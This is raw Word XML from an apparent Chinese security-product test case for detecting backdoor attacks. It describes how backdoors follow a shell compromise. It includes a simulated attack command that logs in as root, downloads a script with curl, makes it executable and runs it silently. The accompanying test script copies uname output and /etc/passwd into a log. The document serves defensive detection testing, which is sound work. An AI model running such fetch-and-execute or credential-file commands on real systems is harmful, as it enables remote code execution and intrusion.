          <w:p w14:paraId="18942E57" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4CF059D5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-0"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BB30E88" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F413C30" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="295" w:name="_Toc2063268988"/>
      <w:bookmarkStart w:id="296" w:name="_Toc36487929"/>
      <w:r w:rsidRPr="00536672">
        <w:t>后门攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="295"/>
      <w:bookmarkEnd w:id="296"/>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6823"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="061600DB" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="359"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64AEF3E6"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23" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26CF9F10" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>后门攻击检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="5B2B3BFE" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="473"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="152B9572" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>测试工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4410FF9E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>无需额外的工具，通过提供的测试脚本模拟后门攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="10F1F6DA" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="208"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24A9792F"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23" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="149AC7DC" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>用户行为分析各组件安全完毕，实时检测数据流正常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="5C7930A7" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="9549"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D97B7F4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>测试步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3078CC4E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>概述：在获取到shell通道后，需要在目标机器上实现提权，rootkit，隐蔽通道等一系列攻击，其中的后门可能会在后台远程的获取攻击指令，也有可能利用本地的计算和网络资源进行ddos和挖矿。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25429CD0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>一次正常的后门攻击往往是在获得一个shell之后进行的，在获得登录shell或交互式shell之后通常会自动从网络上下载攻击脚本，执行后进行rootkit，自启动添加，远程指令等一系列攻击。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07868E30" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="50098ADF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>具体测试过程：通过如下命令模拟常见的后门攻击状态</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19217923" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>模拟攻击命令：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3430EB50" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="53C02D5C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3CFE862C" wp14:editId="0B6E0B85">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>56515</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>6350</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="4078605" cy="1432560"/>
                      <wp:effectExtent l="6350" t="6350" r="29845" b="8890"/>
                      <wp:wrapNone/>
                      <wp:docPr id="6" name="Text Box 1"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr txBox="1"/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="1212850" y="4841240"/>
                                <a:ext cx="4078605" cy="1432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4EAF86" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                                  <w:pPr>
                                    <w:pStyle w:val="8lab-7"/>
                                  </w:pPr>
                                  <w:r>
                                    <w:t xml:space="preserve">  </w:t>
                                  </w:r>
                                  <w:proofErr w:type="gramStart"/>
                                  <w:r>
                                    <w:t>ssh</w:t>
                                  </w:r>
                                  <w:proofErr w:type="gramEnd"/>
                                  <w:r>
                                    <w:t xml:space="preserve"> root@{host}  “Curl </w:t>
                                  </w:r>
                                  <w:hyperlink r:id="rId35" w:history="1">
                                    <w:r>
                                      <w:rPr>
                                        <w:rStyle w:val="af3"/>
                                      </w:rPr>
                                      <w:t>www.8lab.cn/backdoor.sh</w:t>
                                    </w:r>
                                  </w:hyperlink>
                                  <w:r>
                                    <w:t xml:space="preserve"> &gt; /tmp/backdoor.sh &amp;&amp;chmod a+x /tmp/backdoor.sh &amp;&amp; /tmp/backdoor.sh &gt; /dev/null 2&gt;&amp;1” </w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="09B0978D" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                                  <w:pPr>
                                    <w:pStyle w:val="8lab-7"/>
                                  </w:pPr>
                                </w:p>
                                <w:p w14:paraId="56B2B70A" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRPr="00617C51" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                                  <w:pPr>
                                    <w:pStyle w:val="8lab-7"/>
                                  </w:pPr>
                                  <w:r w:rsidRPr="00617C51">
                                    <w:t xml:space="preserve"> (登录-&gt;下载攻击脚本-&gt;赋予执行权限-&gt;执行攻击脚本并忽略输出）</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="2124EB07" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                                  <w:pPr>
                                    <w:pStyle w:val="8lab-7"/>
                                  </w:pPr>
                                </w:p>
                                <w:p w14:paraId="205930B4" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9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CFE862C" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                      <v:stroke joinstyle="miter"/>
                      <v:path gradientshapeok="t" o:connecttype="rect"/>
                    </v:shapetype>
                    <v:shape id="Text Box 1" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:4.45pt;margin-top:.5pt;width:321.15pt;height:112.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" fillcolor="white [3201]" strokeweight=".5pt">
                      <v:textbox>
                        <w:txbxContent>
                          <w:p w14:paraId="744EAF86" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                            <w:pPr>
                              <w:pStyle w:val="8lab-7"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">  </w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>ssh</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> root@{host}  “Curl </w:t>
                            </w:r>
                            <w:hyperlink r:id="rId36" w:history="1">
                              <w:r>
                                <w:rPr>
                                  <w:rStyle w:val="af3"/>
                                </w:rPr>
                                <w:t>www.8lab.cn/backdoor.sh</w:t>
                              </w:r>
                            </w:hyperlink>
                            <w:r>
                              <w:t xml:space="preserve"> &gt; /tmp/backdoor.sh &amp;&amp;chmod a+x /tmp/backdoor.sh &amp;&amp; /tmp/backdoor.sh &gt; /dev/null 2&gt;&amp;1” </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="09B0978D" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                            <w:pPr>
                              <w:pStyle w:val="8lab-7"/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="56B2B70A" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRPr="00617C51" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                            <w:pPr>
                              <w:pStyle w:val="8lab-7"/>
                            </w:pPr>
                            <w:r w:rsidRPr="00617C51">
                              <w:t xml:space="preserve"> (登录-&gt;下载攻击脚本-&gt;赋予执行权限-&gt;执行攻击脚本并忽略输出）</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2124EB07" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                            <w:pPr>
                              <w:pStyle w:val="8lab-7"/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="205930B4" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C"/>
                        </w:txbxContent>
                      </v:textbox>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E98FF56" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1E8842B6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6C7409FE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3AB05939" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1A5BB49A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4B2C4A11" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="left"/>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mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="17BCB660" wp14:editId="3DAD382C">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>635</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>395605</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="4000500" cy="1506855"/>
                      <wp:effectExtent l="6350" t="6350" r="6350" b="10795"/>
                      <wp:wrapNone/>
                      <wp:docPr id="14" name="Text Box 2"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr txBox="1"/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="4000500" cy="15068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5936FE" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                                  <w:proofErr w:type="gramStart"/>
                                  <w:r>
                                    <w:t>#!/</w:t>
                                  </w:r>
                                  <w:proofErr w:type="gramEnd"/>
                                  <w:r>
                                    <w:t>bin/bash</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="6F9FAE8C" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                                  <w:r>
                                    <w:t>#backdoor.sh</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="5BF82FDD" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                                  <w:r>
                                    <w:t>#this is test attack script</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="5B5106A1" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                                  <w:proofErr w:type="gramStart"/>
                                  <w:r>
                                    <w:t>echo</w:t>
                                  </w:r>
                                  <w:proofErr w:type="gramEnd"/>
                                  <w:r>
                                    <w:t xml:space="preserve"> `date` &gt;&gt; /tmp/attack.log </w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="4E78240E" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                                  <w:proofErr w:type="gramStart"/>
                                  <w:r>
                                    <w:t>echo</w:t>
                                  </w:r>
                                  <w:proofErr w:type="gramEnd"/>
                                  <w:r>
                                    <w:t xml:space="preserve"> `uname -a` &gt;&gt; /tmp/attack.log</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="720C178E" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                                  <w:proofErr w:type="gramStart"/>
                                  <w:r>
                                    <w:t>cat</w:t>
                                  </w:r>
                                  <w:proofErr w:type="gramEnd"/>
                                  <w:r>
                                    <w:t xml:space="preserve"> /etc/passwd &gt;&gt; /tmp/attack.log</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="54F0A70F" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                                  <w:proofErr w:type="gramStart"/>
                                  <w:r>
                                    <w:t>echo</w:t>
                                  </w:r>
                                  <w:proofErr w:type="gramEnd"/>
                                  <w:r>
                                    <w:t xml:space="preserve"> ‘================’ &gt;&gt; /tmp/attack.log</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="2F45C9AF" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9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BCB660" id="Text Box 2" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:.05pt;margin-top:31.15pt;width:315pt;height:118.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" fillcolor="white [3201]" strokeweight=".5pt">
                      <v:textbox>
                        <w:txbxContent>
                          <w:p w14:paraId="6E5936FE" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>#!/</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t>bin/bash</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6F9FAE8C" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                            <w:r>
                              <w:t>#backdoor.sh</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5BF82FDD" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                            <w:r>
                              <w:t>#this is test attack script</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5B5106A1" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>echo</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> `date` &gt;&gt; /tmp/attack.log </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4E78240E" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>echo</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> `uname -a` &gt;&gt; /tmp/attack.log</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="720C178E" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>cat</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> /etc/passwd &gt;&gt; /tmp/attack.log</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="54F0A70F" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>echo</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> ‘================’ &gt;&gt; /tmp/attack.log</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2F45C9AF" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C"/>
                        </w:txbxContent>
                      </v:textbox>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>模拟攻击脚本：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D224B02" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="27A48DF4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6EE697CA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1F5A0B88" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="29D17CE1" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="747"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="304C651D"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23" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DCFD955"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hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>WebUI</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>或微信告警系统</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
